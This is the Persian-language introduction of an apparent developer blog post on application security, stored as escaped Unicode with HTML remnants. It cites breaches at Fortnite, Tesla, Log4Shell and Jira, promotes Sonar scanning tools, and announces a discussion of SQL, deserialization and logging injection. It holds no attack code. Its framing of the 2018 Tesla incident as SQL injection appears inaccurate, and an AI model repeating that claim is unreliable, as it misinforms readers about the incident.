\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u06cc\u0634\u06af\u06cc\u0631\u0627\u0646\u0647 \u0628\u0631\u0627\u06cc \u0645\u062d\u0627\u0641\u0638\u062a \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc \u0634\u0645\u0627 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062a\u0628\u062f\u06cc\u0644 \u0634\u062f\u0646 \u0628\u0647 \u0642\u0631\u0628\u0627\u0646\u06cc \u0628\u0639\u062f\u06cc \u0627\u06cc\u0646 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0647\u0627\u06cc \u06af\u0633\u062a\u0631\u062f\u0647 \u0648 \u0645\u0636\u0631 \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a.<\/p>\n

Sonar \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u0631\u0627\u06cc\u06af\u0627\u0646 \u0648 \u0645\u0646\u0628\u0639 \u0628\u0627\u0632 \u0645\u0627\u0646\u0646\u062f SonarLint\u060c SonarQube \u0648 SonarCloud \u0631\u0627 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062a\u0645\u0627\u0645 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc\u060c \u0647\u0634\u062f\u0627\u0631 \u062f\u0627\u062f\u0647 \u0648 \u0631\u0627\u0647\u200c\u062d\u0644\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u067e\u06cc\u0634\u0646\u0647\u0627\u062f \u06a9\u0646\u0646\u062f.<\/p>\n

\n

\u062f\u0631 \u0633\u0627\u0644 \u06f2\u06f0\u06f1\u06f9\u060c \u06cc\u06a9 \u0631\u062e\u0646\u0647 \u0645\u0639\u0631\u0648\u0641 \u062f\u0631 \u0628\u0627\u0632\u06cc \u0645\u0639\u0631\u0648\u0641 Fortnite\u060c \u0645\u06cc\u0644\u06cc\u0648\u0646\u200c\u0647\u0627 \u0628\u0627\u0632\u06cc\u06a9\u0646 \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0628\u062f\u0627\u0641\u0632\u0627\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f. \u0627\u06cc\u0646 \u062d\u0627\u062f\u062b\u0647 \u0627\u0647\u0645\u06cc\u062a \u0627\u06cc\u0645\u0646 \u0633\u0627\u0632\u06cc \u0635\u062d\u06cc\u062d \u067e\u0627\u06cc\u06af\u0627\u0647 \u0647\u0627\u06cc \u062f\u0627\u062f\u0647 SQL \u0631\u0627 \u0628\u0631\u062c\u0633\u062a\u0647 \u06a9\u0631\u062f.<\/p>\n

\u0627\u0645\u0627 \u0627\u06cc\u0646 \u06cc\u06a9 \u0645\u0648\u0636\u0648\u0639 \u0645\u0646\u0641\u0631\u062f \u0646\u06cc\u0633\u062a.<\/strong><\/p>\n

\u062d\u0645\u0644\u0627\u062a \u0645\u062a\u0639\u062f\u062f\u06cc \u0634\u0627\u0645\u0644 \u062a\u0632\u0631\u06cc\u0642 SQL \u0631\u062e \u062f\u0627\u062f\u0647 \u0627\u0633\u062a\u060c \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u0627\u06cc \u06a9\u0647 \u062a\u0633\u0644\u0627 \u062f\u0631 \u0633\u0627\u0644 2018 \u062a\u062c\u0631\u0628\u0647 \u06a9\u0631\u062f. \u062f\u0631 \u0622\u0646 \u0645\u0648\u0631\u062f\u060c \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u062a\u0632\u0631\u06cc\u0642 SQL \u062f\u06cc\u06af\u0631 \u0628\u0631 \u06a9\u0646\u0633\u0648\u0644 Kubernetes \u062a\u0633\u0644\u0627 \u062a\u0623\u062b\u06cc\u0631 \u06af\u0630\u0627\u0634\u062a \u0648 \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u06cc\u067e\u062a\u0648 \u0628\u0627\u0639\u062b \u062e\u0633\u0627\u0631\u0627\u062a \u0645\u0627\u0644\u06cc \u0634\u062f.<\/p>\n

\u0627\u0645\u0627 \u0627\u06cc\u0646 \u0641\u0642\u0637 \u062f\u0631 \u0645\u0648\u0631\u062f SQL Injection \u0646\u06cc\u0633\u062a.<\/strong><\/p>\n

\u0628\u0631\u062f\u0627\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u062f\u06cc\u06af\u0631\u06cc \u0646\u06cc\u0632 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u06a9\u0647 \u06a9\u062f \u0634\u0645\u0627 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0627\u0632 \u0622\u0646\u0647\u0627 \u0631\u0646\u062c \u0645\u06cc \u0628\u0631\u062f\u060c \u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0632\u0631\u06af \u062f\u0631 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647 \u0627\u0646\u062f. <\/p>\n

\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0633\u0627\u0644 2021 \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Log4J \u0628\u0647 \u0646\u0627\u0645 Log4Shell \u06a9\u0647 \u0634\u0627\u0645\u0644 \u06cc\u06a9 \u062d\u0645\u0644\u0647 logging injection \u0628\u0648\u062f \u06a9\u0647 \u062a\u0627 \u0628\u0647 \u0627\u0645\u0631\u0648\u0632 \u0645\u06cc\u0644\u06cc\u0648\u0646 \u0647\u0627 \u0633\u0631\u0648\u0631 \u0631\u0627 \u062f\u0631 \u0633\u0631\u0627\u0633\u0631 \u062c\u0647\u0627\u0646 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u060c \u06cc\u0627 \u062f\u0631 \u0633\u0627\u0644 2022 \u062f\u0631 Atlassian Jira \u06a9\u0647 \u0634\u0627\u0645\u0644 \u06cc\u06a9 \u062d\u0645\u0644\u0647 deserialization \u0628\u0648\u062f \u06a9\u0647 \u0686\u0646\u062f\u06cc\u0646 \u0646\u0633\u062e\u0647 \u0627\u0632 Jira \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f \u0648 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0631\u0627 \u0628\u0647 \u062c\u06cc\u0631\u0627 \u0648\u0627\u06af\u0630\u0627\u0631 \u06a9\u0631\u062f. \u0645\u0647\u0627\u062c\u0645<\/p>\n

\u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0631\u0627\u06cc \u0647\u0631 \u06a9\u0633\u06cc \u0627\u062a\u0641\u0627\u0642 \u0628\u06cc\u0641\u062a\u062f\u060c \u062d\u062a\u06cc \u0628\u0631\u0627\u06cc \u0634\u0645\u0627.<\/strong><\/p>\n

\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647\u060c \u0645\u0646 \u062f\u0631 \u0645\u0648\u0631\u062f 3 \u062d\u0645\u0644\u0647 \u0631\u0627\u06cc\u062c \u062f\u0631 \u06a9\u062f \u0628\u062d\u062b \u062e\u0648\u0627\u0647\u0645 \u06a9\u0631\u062f: \u062a\u0632\u0631\u06cc\u0642 SQL\u060c \u062a\u0632\u0631\u06cc\u0642 Deserialization\u060c \u0648 Logging Injection \u0648 \u0646\u062d\u0648\u0647 \u062d\u0644 \u0622\u0646\u0647\u0627.<\/p>\n

\n
\n

\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/p>\nToggle<\/span><\/path><\/svg><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n